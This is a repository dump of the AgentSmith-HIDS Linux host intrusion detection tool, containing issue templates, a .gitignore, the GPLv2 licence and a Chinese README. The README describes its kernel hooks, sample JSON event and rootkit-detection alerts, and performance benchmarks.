[ { "path": ".github/ISSUE_TEMPLATE/bug_report.md", "content": "---\nname: Bug report\nabout: Create a report to help us improve\ntitle: ''\nlabels: ''\nassignees: ''\n\n---\n\n**Describe the bug**\nA clear and concise description of what the bug is.\n\n**To Reproduce**\nSteps to reproduce the behavior:\n1. Go to '...'\n2. Click on '....'\n3. Scroll down to '....'\n4. See error\n\n**Expected behavior**\nA clear and concise description of what you expected to happen.\n\n**Screenshots**\nIf applicable, add screenshots to help explain your problem.\n\n**Desktop (please complete the following information):**\n - OS: [e.g. iOS]\n - Browser [e.g. chrome, safari]\n - Version [e.g. 22]\n\n**Smartphone (please complete the following information):**\n - Device: [e.g. iPhone6]\n - OS: [e.g. iOS8.1]\n - Browser [e.g. stock browser, safari]\n - Version [e.g. 22]\n\n**Additional context**\nAdd any other context about the problem here.\n" }, { "path": ".github/ISSUE_TEMPLATE/custom.md", "content": "---\nname: Custom issue template\nabout: Describe this issue template's purpose here.\ntitle: ''\nlabels: ''\nassignees: ''\n\n---\n\n\n" }, { "path": ".github/ISSUE_TEMPLATE/feature_request.md", "content": "---\nname: Feature request\nabout: Suggest an idea for this project\ntitle: ''\nlabels: ''\nassignees: ''\n\n---\n\n**Is your feature request related to a problem? Please describe.**\nA clear and concise description of what the problem is. Ex. I'm always frustrated when [...]\n\n**Describe the solution you'd like**\nA clear and concise description of what you want to happen.\n\n**Describe alternatives you've considered**\nA clear and concise description of any alternative solutions or features you've considered.\n\n**Additional context**\nAdd any other context or screenshots about the feature request here.\n" }, { "path": ".gitignore", "content": "# Created by .ignore support plugin (hsz.mobi)\n### C template\n# Prerequisites\n*.d\n\n# Object files\n*.o\n*.obj\n*.elf\n\n# Linker output\n*.ilk\n*.map\n*.exp\n\n# Precompiled Headers\n*.gch\n*.pch\n\n# Libraries\n*.lib\n*.a\n*.la\n*.lo\n\n# Shared objects (inc. Windows DLLs)\n*.dll\n*.so\n*.so.*\n*.dylib\n\n# Executables\n*.exe\n*.out\n*.app\n*.i*86\n*.x86_64\n*.hex\n\n# Debug files\n*.dSYM/\n*.su\n*.idb\n*.pdb\n\n# Kernel Module Compile Results\n*.cmd\n.tmp_versions/\nmodules.order\nModule.symvers\nMkfile.old\ndkms.conf\n### Rust template\n# Generated by Cargo\n# will have compiled files and executables\n/target/\n\n# Remove Cargo.lock from gitignore if creating an executable, leave it for libraries\n# More information here https://doc.rust-lang.org/cargo/guide/cargo-toml-vs-cargo-lock.html\nCargo.lock\n\n# These are backup files generated by rustfmt\n**/*.rs.bk\n\n.DS_Store\n.idea/\n.vscode/" }, { "path": "LICENSE", "content": " GNU GENERAL PUBLIC LICENSE\n Version 2, June 1991\n\n Copyright (C) 1989, 1991 Free Software Foundation, Inc.,\n 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA\n Everyone is permitted to copy and distribute verbatim copies\n of this license document, but changing it is not allowed.\n\n Preamble\n\n The licenses for most software are designed to take away your\nfreedom to share and change it. By contrast, the GNU General Public\nLicense is intended to guarantee your freedom to share and change free\nsoftware--to make sure the software is free for all its users. This\nGeneral Public License applies to most of the Free Software\nFoundation's software and to any other program whose authors commit to\nusing it. (Some other Free Software Foundation software is covered by\nthe GNU Lesser General Public License instead.) You can apply it to\nyour programs, too.\n\n When we speak of free software, we are referring to freedom, not\nprice. Our General Public Licenses are designed to make sure that you\nhave the freedom to distribute copies of free software (and charge for\nthis service if you wish), that you receive source code or can get it\nif you want it, that you can change the software or use pieces of it\nin new free programs; and that you know you can do these things.\n\n To protect your rights, we need to make restrictions that forbid\nanyone to deny you these rights or to ask you to surrender the rights.\nThese restrictions translate to certain responsibilities for you if you\ndistribute copies of the software, or if you modify it.\n\n For example, if you distribute copies of such a program, whether\ngratis or for a fee, you must give the recipients all the rights that\nyou have. You must make sure that they, too, receive or can get the\nsource code. And you must show them these terms so they know their\nrights.\n\n We protect your rights with two steps: (1) copyright the software, and\n(2) offer you this license which gives you legal permission to copy,\ndistribute and/or modify the software.\n\n Also, for each author's protection and ours, we want to make certain\nthat everyone understands that there is no warranty for this free\nsoftware. If the software is modified by someone else and passed on, we\nwant its recipients to know that what they have is not the original, so\nthat any problems introduced by others will not reflect on the original\nauthors' reputations.\n\n Finally, any free program is threatened constantly by software\npatents. We wish to avoid the danger that redistributors of a free\nprogram will individually obtain patent licenses, in effect making the\nprogram proprietary. To prevent this, we have made it clear that any\npatent must be licensed for everyone's free use or not licensed at all.\n\n The precise terms and conditions for copying, distribution and\nmodification follow.\n\n GNU GENERAL PUBLIC LICENSE\n TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION\n\n 0. This License applies to any program or other work which contains\na notice placed by the copyright holder saying it may be distributed\nunder the terms of this General Public License. The \"Program\", below,\nrefers to any such program or work, and a \"work based on the Program\"\nmeans either the Program or any derivative work under copyright law:\nthat is to say, a work containing the Program or a portion of it,\neither verbatim or with modifications and/or translated into another\nlanguage. (Hereinafter, translation is included without limitation in\nthe term \"modification\".) Each licensee is addressed as \"you\".\n\nActivities other than copying, distribution and modification are not\ncovered by this License; they are outside its scope. The act of\nrunning the Program is not restricted, and the output from the Program\nis covered only if its contents constitute a work based on the\nProgram (independent of having been made by running the Program).\nWhether that is true depends on what the Program does.\n\n 1. You may copy and distribute verbatim copies of the Program's\nsource code as you receive it, in any medium, provided that you\nconspicuously and appropriately publish on each copy an appropriate\ncopyright notice and disclaimer of warranty; keep intact all the\nnotices that refer to this License and to the absence of any warranty;\nand give any other recipients of the Program a copy of this License\nalong with the Program.\n\nYou may charge a fee for the physical act of transferring a copy, and\nyou may at your option offer warranty protection in exchange for a fee.\n\n 2. You may modify your copy or copies of the Program or any portion\nof it, thus forming a work based on the Program, and copy and\ndistribute such modifications or work under the terms of Section 1\nabove, provided that you also meet all of these conditions:\n\n a) You must cause the modified files to carry prominent notices\n stating that you changed the files and the date of any change.\n\n b) You must cause any work that you distribute or publish, that in\n whole or in part contains or is derived from the Program or any\n part thereof, to be licensed as a whole at no charge to all third\n parties under the terms of this License.\n\n c) If the modified program normally reads commands interactively\n when run, you must cause it, when started running for such\n interactive use in the most ordinary way, to print or display an\n announcement including an appropriate copyright notice and a\n notice that there is no warranty (or else, saying that you provide\n a warranty) and that users may redistribute the program under\n these conditions, and telling the user how to view a copy of this\n License. (Exception: if the Program itself is interactive but\n does not normally print such an announcement, your work based on\n the Program is not required to print an announcement.)\n\nThese requirements apply to the modified work as a whole. If\nidentifiable sections of that work are not derived from the Program,\nand can be reasonably considered independent and separate works in\nthemselves, then this License, and its terms, do not apply to those\nsections when you distribute them as separate works. But when you\ndistribute the same sections as part of a whole which is a work based\non the Program, the distribution of the whole must be on the terms of\nthis License, whose permissions for other licensees extend to the\nentire whole, and thus to each and every part regardless of who wrote it.\n\nThus, it is not the intent of this section to claim rights or contest\nyour rights to work written entirely by you; rather, the intent is to\nexercise the right to control the distribution of derivative or\ncollective works based on the Program.\n\nIn addition, mere aggregation of another work not based on the Program\nwith the Program (or with a work based on the Program) on a volume of\na storage or distribution medium does not bring the other work under\nthe scope of this License.\n\n 3. You may copy and distribute the Program (or a work based on it,\nunder Section 2) in object code or executable form under the terms of\nSections 1 and 2 above provided that you also do one of the following:\n\n a) Accompany it with the complete corresponding machine-readable\n source code, which must be distributed under the terms of Sections\n 1 and 2 above on a medium customarily used for software interchange; or,\n\n b) Accompany it with a written offer, valid for at least three\n years, to give any third party, for a charge no more than your\n cost of physically performing source distribution, a complete\n machine-readable copy of the corresponding source code, to be\n distributed under the terms of Sections 1 and 2 above on a medium\n customarily used for software interchange; or,\n\n c) Accompany it with the information you received as to the offer\n to distribute corresponding source code. (This alternative is\n allowed only for noncommercial distribution and only if you\n received the program in object code or executable form with such\n an offer, in accord with Subsection b above.)\n\nThe source code for a work means the preferred form of the work for\nmaking modifications to it. For an executable work, complete source\ncode means all the source code for all modules it contains, plus any\nassociated interface definition files, plus the scripts used to\ncontrol compilation and installation of the executable. However, as a\nspecial exception, the source code distributed need not include\nanything that is normally distributed (in either source or binary\nform) with the major components (compiler, kernel, and so on) of the\noperating system on which the executable runs, unless that component\nitself accompanies the executable.\n\nIf distribution of executable or object code is made by offering\naccess to copy from a designated place, then offering equivalent\naccess to copy the source code from the same place counts as\ndistribution of the source code, even though third parties are not\ncompelled to copy the source along with the object code.\n\n 4. You may not copy, modify, sublicense, or distribute the Program\nexcept as expressly provided under this License. Any attempt\notherwise to copy, modify, sublicense or distribute the Program is\nvoid, and will automatically terminate your rights under this License.\nHowever, parties who have received copies, or rights, from you under\nthis License will not have their licenses terminated so long as such\nparties remain in full compliance.\n\n 5. You are not required to accept this License, since you have not\nsigned it. However, nothing else grants you permission to modify or\ndistribute the Program or its derivative works. These actions are\nprohibited by law if you do not accept this License. Therefore, by\nmodifying or distributing the Program (or any work based on the\nProgram), you indicate your acceptance of this License to do so, and\nall its terms and conditions for copying, distributing or modifying\nthe Program or works based on it.\n\n 6. Each time you redistribute the Program (or any work based on the\nProgram), the recipient automatically receives a license from the\noriginal licensor to copy, distribute or modify the Program subject to\nthese terms and conditions. You may not impose any further\nrestrictions on the recipients' exercise of the rights granted herein.\nYou are not responsible for enforcing compliance by third parties to\nthis License.\n\n 7. If, as a consequence of a court judgment or allegation of patent\ninfringement or for any other reason (not limited to patent issues),\nconditions are imposed on you (whether by court order, agreement or\notherwise) that contradict the conditions of this License, they do not\nexcuse you from the conditions of this License. If you cannot\ndistribute so as to satisfy simultaneously your obligations under this\nLicense and any other pertinent obligations, then as a consequence you\nmay not distribute the Program at all. For example, if a patent\nlicense would not permit royalty-free redistribution of the Program by\nall those who receive copies directly or indirectly through you, then\nthe only way you could satisfy both it and this License would be to\nrefrain entirely from distribution of the Program.\n\nIf any portion of this section is held invalid or unenforceable under\nany particular circumstance, the balance of the section is intended to\napply and the section as a whole is intended to apply in other\ncircumstances.\n\nIt is not the purpose of this section to induce you to infringe any\npatents or other property right claims or to contest validity of any\nsuch claims; this section has the sole purpose of protecting the\nintegrity of the free software distribution system, which is\nimplemented by public license practices. Many people have made\ngenerous contributions to the wide range of software distributed\nthrough that system in reliance on consistent application of that\nsystem; it is up to the author/donor to decide if he or she is willing\nto distribute software through any other system and a licensee cannot\nimpose that choice.\n\nThis section is intended to make thoroughly clear what is believed to\nbe a consequence of the rest of this License.\n\n 8. If the distribution and/or use of the Program is restricted in\ncertain countries either by patents or by copyrighted interfaces, the\noriginal copyright holder who places the Program under this License\nmay add an explicit geographical distribution limitation excluding\nthose countries, so that distribution is permitted only in or among\ncountries not thus excluded. In such case, this License incorporates\nthe limitation as if written in the body of this License.\n\n 9. The Free Software Foundation may publish revised and/or new versions\nof the General Public License from time to time. Such new versions will\nbe similar in spirit to the present version, but may differ in detail to\naddress new problems or concerns.\n\nEach version is given a distinguishing version number. If the Program\nspecifies a version number of this License which applies to it and \"any\nlater version\", you have the option of following the terms and conditions\neither of that version or of any later version published by the Free\nSoftware Foundation. If the Program does not specify a version number of\nthis License, you may choose any version ever published by the Free Software\nFoundation.\n\n 10. If you wish to incorporate parts of the Program into other free\nprograms whose distribution conditions are different, write to the author\nto ask for permission. For software which is copyrighted by the Free\nSoftware Foundation, write to the Free Software Foundation; we sometimes\nmake exceptions for this. Our decision will be guided by the two goals\nof preserving the free status of all derivatives of our free software and\nof promoting the sharing and reuse of software generally.\n\n NO WARRANTY\n\n 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY\nFOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN\nOTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES\nPROVIDE THE PROGRAM \"AS IS\" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED\nOR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF\nMERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS\nTO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE\nPROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,\nREPAIR OR CORRECTION.\n\n 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING\nWILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR\nREDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,\nINCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING\nOUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED\nTO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY\nYOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER\nPROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE\nPOSSIBILITY OF SUCH DAMAGES.\n\n END OF TERMS AND CONDITIONS\n\n How to Apply These Terms to Your New Programs\n\n If you develop a new program, and you want it to be of the greatest\npossible use to the public, the best way to achieve this is to make it\nfree software which everyone can redistribute and change under these terms.\n\n To do so, attach the following notices to the program. It is safest\nto attach them to the start of each source file to most effectively\nconvey the exclusion of warranty; and each file should have at least\nthe \"copyright\" line and a pointer to where the full notice is found.\n\n \n Copyright (C) \n\n This program is free software; you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation; either version 2 of the License, or\n (at your option) any later version.\n\n This program is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU General Public License for more details.\n\n You should have received a copy of the GNU General Public License along\n with this program; if not, write to the Free Software Foundation, Inc.,\n 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.\n\nAlso add information on how to contact you by electronic and paper mail.\n\nIf the program is interactive, make it output a short notice like this\nwhen it starts in an interactive mode:\n\n Gnomovision version 69, Copyright (C) year name of author\n Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'.\n This is free software, and you are welcome to redistribute it\n under certain conditions; type `show c' for details.\n\nThe hypothetical commands `show w' and `show c' should show the appropriate\nparts of the General Public License. Of course, the commands you use may\nbe called something other than `show w' and `show c'; they could even be\nmouse-clicks or menu items--whatever suits your program.\n\nYou should also get your employer (if you work as a programmer) or your\nschool, if any, to sign a \"copyright disclaimer\" for the program, if\nnecessary. Here is a sample; alter the names:\n\n Yoyodyne, Inc., hereby disclaims all copyright interest in the program\n `Gnomovision' (which makes passes at compilers) written by James Hacker.\n\n , 1 April 1989\n Ty Coon, President of Vice\n\nThis General Public License does not permit incorporating your program into\nproprietary programs. If your program is a subroutine library, you may\nconsider it more useful to permit linking proprietary applications with the\nlibrary. If this is what you want to do, use the GNU Lesser General\nPublic License instead of this License.\n" }, { "path": "README-zh_CN.md", "content": "# AgentSmith-HIDS\n\n                            --项目名称灵感来源于电影《黑客帝国》\n\n\n\n\n[![License](https://img.shields.io/badge/License-GPL%20v2-blue.svg)](https://github.com/DianrongSecurity/AgentSmith-HIDS/blob/master/LICENSE) [![Project Status: Active – The project has reached a stable, usable state and is being actively developed.](https://www.repostatus.org/badges/latest/active.svg)](https://www.repostatus.org/#active)\n\n[English](README.md) | 简体中文\n\n# THIS REPO IS OLD \n# RELEASE VERSION: https://github.com/bytedance/Elkeid\n\n\n### 关于AgentSmith-HIDS\n\nAgentSmith-HIDS严格意义上并不是一个“Host-based Intrusion Detection System”,因为目前开源的部分来讲它缺乏了规则引擎和相关检测的能力,但是它可以作为一个高性能“主机信息收集工具”来构建属于你自己的HIDS。\n由于AgentSmit-HIDS的特点(**从内核态获取尽可能全的数据**),对比用户态的HIDS拥有巨大的优势:\n\n* **性能更优**,通过内核态驱动来获取信息,无需诸如遍历/proc这样的行为进行数据补全;传输方案使用共享内存,而不是netlink,相对来说也有更好的性能表现。\n* **难以绕过**,由于我们的信息获取是来自于内核态驱动,因此面对很多刻意隐藏自己的行为如rootkit难以绕过我们的监控。\n* **为联动而生**,我们不仅可以作为安全工具,也可以作为监控,或者梳理内部资产。我们通过内核模块对进程/用户/文件/网络连接进行梳理,如果有CMDB的信息,那么联动后你将会得到一张从网络到主机/容器/业务信息的调用/依赖关系图;如果你们还有DB Audit Tool,那么联动后你可以得到DB User/库表字段/应用/网络/主机容器的关系;等等,还可以和NIDS/威胁情报联动,达到溯源的目的。\n* **用户态+内核态**,AgentSmith-HIDS同时拥有内核态和用户态的模块,可以形成互补。\n\n\n\n### AgentSmith-HIDS实现了以下的主要功能:\n\n* 内核模块通过kprobeHook了**execve,connect,process inject, create file,DNS query,load LKM**的行为,并且通过对Linux namespace兼容的方式实现了对容器行为的信息收集\n* 用户态支持自定义检测模块,目前已内置:**系统用户列表查询**,**系统端口监听列表查询**,**系统RPM LIST查询**,**系统定时任务查询**\n* **部分Rootkit检测能力**,From: [Tyton](https://github.com/nbulischeck/tyton) ,目前已经移植了**PROC_FILE_HOOK**,**SYSCALL_HOOK**,**LKM_HIDDEN**,**INTERRUPTS_HOOK**,目前仅支持Kernel > 3.10。\n* cred 变化检测 (sudo/su/sshd除外)\n* 用户登陆监控\n\n\n### AgentSmith-HIDS的使用场景/方式(待补充)\n\n* [如何利用AgentSmith-HIDS检测反弹shell](doc/How-to-use-AgentSmith-HIDS-to-detect-reverse-shell/如何利用AgentSmith-HIDS检测反弹shell.md)\n\n\n\n### 关于内核版本兼容性\n\n* Kernel > 2.6.25\n* AntiRootKit > 3.10\n\n\n\n### 对容器的兼容\n\n| 行为源 | Nodename |\n| ------ | -------------- |\n| Host | hostname |\n| Docker | container name |\n| k8s | pod name |\n\n\n\n\n### AgentSmith-HIDS的组成部分\n\n* **内核驱动模块(LKM)**,通过kprobe hook关键函数,进行数据捕获;\n* **用户态Agent**,收取驱动捕获的指令并进行处理,然后将数据发送到Kafka;并向Server发送心跳确认存活,以及接受Server下发的指令进行执行;\n* **Agent Server端**,向Agent下发指令,以及来查看当前Agent状态数量等信息;(可选组件)\n\n\n\n### Execve Hook\n\n通过Hook **sys_execve()/sys_execveat()/compat_sys_execve()/compat_sys_execveat()** 实现,数据样例:\n\n```json\n{\n \"uid\":\"0\",\n \"data_type\":\"59\",\n \"run_path\":\"/tmp\",\n \"exe\":\"/opt/ltp/testcases/bin/growfiles\",\n \"argv\":\"growfiles -W gf26 -D 0 -b -i 0 -L 60 -u -B 1000b -e 1 -r 128-32768:128 -R 512-64000 -T 4 -f gfsmallio-35861 -d /tmp/ltp-Ujxl8kKsKY \",\n \"pid\":\"35861\",\n \"ppid\":\"35711\",\n \"pgid\":\"35861\",\n \"tgid\":\"35861\",\n \"comm\":\"growfiles\",\n \"nodename\":\"test\",\n \"stdin\":\"/dev/pts/1\",\n \"stdout\":\"/dev/pts/1\",\n \"sessionid\":\"3\",\n \"sip\":\"192.168.165.1\",\n \"sport\":\"61726\",\n \"dip\":\"192.168.165.128\",\n \"dport\":\"22\",\n \"sa_family\":\"1\",\n \"pid_tree\":\"1(systemd)->1384(sshd)->2175(sshd)->2177(bash)->2193(fish)->35552(runltp)->35711(ltp-pan)->35861(growfiles)\",\n \"tty_name\":\"pts1\",\n \"socket_process_pid\":\"2175\",\n \"socket_process_exe\":\"/usr/sbin/sshd\",\n \"SSH_CONNECTION\":\"192.168.165.1 61726 192.168.165.128 22\",\n \"LD_PRELOAD\":\"/root/ldpreload/test.so\",\n \"user\":\"root\",\n \"time\":\"1579575429143\",\n \"local_ip\":\"192.168.165.128\",\n \"hostname\":\"test\",\n \"exe_md5\":\"01272152d4901fd3c2efacab5c0e38e5\",\n \"socket_process_exe_md5\":\"686cd72b4339da33bfb6fe8fb94a301f\"\n}\n```\n\n### Bind Hook\n\n通过Hook **sys_bind()** 实现,数据样例:\n\n```json\n{\n \"uid\":\"0\",\n \"data_type\":\"49\",\n \"sa_family\":\"2\",\n \"exe\":\"/usr/bin/python2.7\",\n \"pid\":\"109640\",\n \"ppid\":\"215496\",\n \"pgid\":\"109640\",\n \"tgid\":\"109640\",\n \"comm\":\"python\",\n \"nodename\":\"n225-117-018\",\n \"sip\":\"0.0.0.0\",\n \"sport\":\"8000\",\n \"res\":\"0\",\n \"sessionid\":\"30\",\n \"user\":\"root\",\n \"time\":\"1587540231936\",\n \"local_ip_str\":\"10.225.117.18\",\n \"hostname_str\":\"n225-117-018\",\n \"exe_md5\":\"4f458165a2129ba549f1b6605ee87e74\"\n}\n```\n\n\n### Connect Hook\n\n通过Hook **tcp_v4_connect()/tcp_v6_connect()/ip4_datagram_connect()/ip6_datagram_connect()** 实现,数据样例:\n\n```json\n{\n \"uid\":\"0\",\n \"data_type\":\"42\",\n \"sa_family\":\"2\",\n \"connect_type\":\"4\",\n \"dport\":\"1025\",\n \"dip\":\"180.101.49.11\",\n \"exe\":\"/usr/bin/ping\",\n \"pid\":\"6294\",\n \"ppid\":\"1941\",\n \"pgid\":\"6294\",\n \"tgid\":\"6294\",\n \"comm\":\"ping\",\n \"nodename\":\"test\",\n \"sip\":\"192.168.165.153\",\n \"sport\":\"45524\",\n \"res\":\"0\",\n \"sessionid\":\"1\",\n \"user\":\"root\",\n \"time\":\"1575721921240\",\n \"local_ip\":\"192.168.165.153\",\n \"hostname\":\"test\",\n \"exe_md5\":\"735ae70b4ceb8707acc40bc5a3d06e04\"\n}\n```\n\n\n\n### DNS Query Hook\n\n通过Hook **udp_recvmsg()/udpv6_recvmsg()** 实现,数据样例:\n\n```json\n{\n \"uid\":\"0\",\n \"data_type\":\"601\",\n \"sa_family\":\"2\",\n \"dport\":\"53\",\n \"dip\":\"192.168.165.2\",\n \"exe\":\"/usr/bin/ping\",\n \"pid\":\"6294\",\n \"ppid\":\"1941\",\n \"pgid\":\"6294\",\n \"tgid\":\"6294\",\n \"comm\":\"ping\",\n \"nodename\":\"test\",\n \"sip\":\"192.168.165.153\",\n \"sport\":\"53178\",\n \"qr\":\"1\",\n \"opcode\":\"0\",\n \"rcode\":\"0\",\n \"query\":\"www.baidu.com\",\n \"sessionid\":\"1\",\n \"user\":\"root\",\n \"time\":\"1575721921240\",\n \"local_ip\":\"192.168.165.153\",\n \"hostname\":\"test\",\n \"exe_md5\":\"39c45487a85e26ce5755a893f7e88293\"\n}\n```\n\n\n### Create File Hook\n\n通过Hook **security_inode_create()** 实现,数据样例:\n\n```json\n{\n \"uid\":\"0\",\n \"data_type\":\"602\",\n \"exe\":\"/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.232.b09-0.el7_7.x86_64/jre/bin/java\",\n \"file_path\":\"/tmp/kafka-logs/replication-offset-checkpoint.tmp\",\n \"pid\":\"3341\",\n \"ppid\":\"1\",\n \"pgid\":\"2657\",\n \"tgid\":\"2659\",\n \"comm\":\"kafka-scheduler\",\n \"nodename\":\"test\",\n \"sessionid\":\"3\",\n \"user\":\"root\",\n \"time\":\"1575721984257\",\n \"local_ip\":\"192.168.165.153\",\n \"hostname\":\"test\",\n \"exe_md5\":\"215be70a38c3a2e14e09d637c85d5311\",\n \"create_file_md5\":\"d41d8cd98f00b204e9800998ecf8427e\"\n}\n```\n\n\n\n### Process Inject Hook\n\n通过Hook **sys_ptrace()** 实现,数据样例:\n\n```json\n{\n \"uid\":\"0\",\n \"data_type\":\"101\",\n \"ptrace_request\":\"4\",\n \"target_pid\":\"7402\",\n \"addr\":\"00007ffe13011ee6\",\n \"data\":\"-a\",\n \"exe\":\"/root/ptrace/ptrace\",\n \"pid\":\"7401\",\n \"ppid\":\"1941\",\n \"pgid\":\"7401\",\n \"tgid\":\"7401\",\n \"comm\":\"ptrace\",\n \"nodename\":\"test\",\n \"sessionid\":\"1\",\n \"user\":\"root\",\n \"time\":\"1575722717065\",\n \"local_ip\":\"192.168.165.153\",\n \"hostname\":\"test\",\n \"exe_md5\":\"863293f9fcf1af7afe5797a4b6b7aa0a\"\n}\n```\n\n\n### Load LKM File Hook\n\n通过Hook **load_module()** 实现,数据样例:\n\n```json\n{\n \"uid\":\"0\",\n \"data_type\":\"603\",\n \"exe\":\"/usr/bin/kmod\",\n \"lkm_file\":\"/root/ptrace/ptrace\",\n \"pid\":\"29461\",\n \"ppid\":\"9766\",\n \"pgid\":\"29461\",\n \"tgid\":\"29461\",\n \"comm\":\"insmod\",\n \"nodename\":\"test\",\n \"sessionid\":\"13\",\n \"user\":\"root\",\n \"time\":\"1577212873791\",\n \"local_ip\":\"192.168.165.152\",\n \"hostname\":\"test\",\n \"exe_md5\":\"0010433ab9105d666b044779f36d6d1e\",\n \"load_file_md5\":\"863293f9fcf1af7afe5797a4b6b7aa0a\"\n}\n```\n\n\n### Cred Change Hook\n\n通过Hook **commit_creds()** 实现,数据样例:\n\n```json\n{\n \"uid\":\"0\",\n \"data_type\":\"604\",\n \"exe\":\"/tmp/tt\",\n \"pid\":\"27737\",\n \"ppid\":\"26865\",\n \"pgid\":\"27737\",\n \"tgid\":\"27737\",\n \"comm\":\"tt\",\n \"old_uid\":\"1000\",\n \"nodename\":\"test\",\n \"sessionid\":\"42\",\n \"user\":\"root\",\n \"time\":\"1578396197131\",\n \"local_ip\":\"192.168.165.152\",\n \"hostname\":\"test\",\n \"exe_md5\":\"d99a695d2dc4b5099383f30964689c55\"\n}\n```\n\n\n### User Login Alert\n```json\n{\n \"data_type\":\"1001\",\n \"status\":\"Failed\",\n \"type\":\"password\",\n \"user_exsit\":\"false\",\n \"user\":\"sad\",\n \"from_ip\":\"192.168.165.1\",\n \"port\":\"63089\",\n \"processor\":\"ssh2\",\n \"time\":\"1578405483119\",\n \"local_ip\":\"192.168.165.128\",\n \"hostname\":\"localhost.localdomain\"\n}\n```\n\n\n### PROC File Hook Alert\n```json\n{\n \"uid\":\"-1\",\n \"data_type\":\"700\",\n \"module_name\":\"autoipv6\",\n \"hidden\":\"0\",\n \"time\":\"1578384987766\",\n \"local_ip\":\"192.168.165.152\",\n \"hostname\":\"test\"\n}\n```\n\n\n### Syscall Hook Alert\n```json\n{\n \"uid\":\"-1\",\n \"data_type\":\"701\",\n \"module_name\":\"diamorphine\",\n \"hidden\":\"1\",\n \"syscall_number\":\"78\",\n \"time\":\"1578384927606\",\n \"local_ip\":\"192.168.165.152\",\n \"hostname\":\"test\"\n}\n```\n\n\n### LKM Hidden Alert\n```json\n{\n \"uid\":\"-1\",\n \"data_type\":\"702\",\n \"module_name\":\"diamorphine\",\n \"hidden\":\"1\",\n \"time\":\"1578384927606\",\n \"local_ip\":\"192.168.165.152\",\n \"hostname\":\"test\"\n}\n```\n\n\n### Interrupts Hook Alert\n```json\n{\n \"uid\":\"-1\",\n \"data_type\":\"703\",\n \"module_name\":\"syshook\",\n \"hidden\":\"1\",\n \"interrupt_number\":\"2\",\n \"time\":\"1578384927606\",\n \"local_ip\":\"192.168.165.152\",\n \"hostname\":\"test\"\n}\n```\n\n\n### 关于性能\n\n测试环境(VM):\n\n| CPU | Intel(R) Xeon(R) Platinum 8260 CPU @ 2.40GHz 4核 |\n| --------- | ------------------------------------------------ |\n| RAM | 8GB |\n| OS/Kernel | Debian9 / 4.14.81.bm.19-amd64 |\n\n测试负载:\n\n`ltp -f syscalls`\n\n测试结果(1min):\n\n| Hook Handler | Average Delay(us) | TP99(us) | TP95(us) | TP90(us) |\n| ---------------------- | ----------------- | ----|----|----|\n| connect_entry_handler| 0.2914 |6.7627|0.355|0.3012|\n| connect_handler | 2.1406 |18.3801|12.102|7.832|\n| execve_entry_handler | 5.9320 |13.7034|9.908|8.334|\n| execve_handler | 6.8826 |26.0584|15.9976|12.6260|\n| security_inode_create_entry_handler| 1.9963|9.3042|6.7730|4.6816|\n| security_inode_create_handler| 4.2114|13.2165|8.83775|6.534|\n\n原始测试数据:\n\n[Benchmark Data](https://github.com/EBWi11/AgentSmith-HIDS/tree/master/benchmark_data)\n\n\n使用cyclictest进行测试\n\n`cyclictest -p 90 - m -c 0 -i 200 -n -h 100 -q -l 1000000`\n\nUninstall Smith:\n```\n# Total: 000999485\n# Min Latencies: 00002\n# Avg Latencies: 00007\n# Max Latencies: 13905\n# Histogram Overflows: 00515\n```\n\ninstall Smith:\n```\n# Total: 000999519\n# Min Latencies: 00002\n# Avg Latencies: 00007\n# Max Latencies: 15216\n# Histogram Overflows: 00481\n```\n\n\n**time -v /opt/ltp/testcases/bin/execve05 -n 30000**\n\n10 times\n\nInstall Smith:\n\n| Average User Time(s) | Average System Time(s) |\n| ---------------------- | ----------------- |\n|22.329|14.885|\n\nUninstall Smith:\n\n| Average User Time(s) | Average System Time(s) |\n| ---------------------- | ----------------- |\n|22.271|14.395|\n\n### 部署及测试文档\n\n[Quick Start](https://github.com/EBWi11/AgentSmith-HIDS/blob/master/doc/AgentSmith-HIDS-Quick-Start-zh_CN.md)\n\n\n\n\n### 致谢(排名不分先后)\n\n[yuzunzhi](https://github.com/yuzunzhi)\n\n[hapood](https://github.com/hapood)\n\n[HF-Daniel](https://github.com/HF-Daniel)\n\n[smcdef](https://github.com/smcdef)\n\n\n### 作者微信\n\n**使用过程中遇到任何问题请提ISSUE,其他讨论可加微信**\n\n**使用过程中遇到任何问题请提ISSUE,其他讨论可加微信**\n\n**使用过程中遇到任何问题请提ISSUE,其他讨论可加微信**\n\n\n\n**使用过程中遇到任何问题请提ISSUE,其他讨论可加微信**\n\n**使用过程中遇到任何问题请提ISSUE,其他讨论可加微信**\n\n**使用过程中遇到任何问题请提ISSUE,其他讨论可加微信**\n\n\n\n\n### 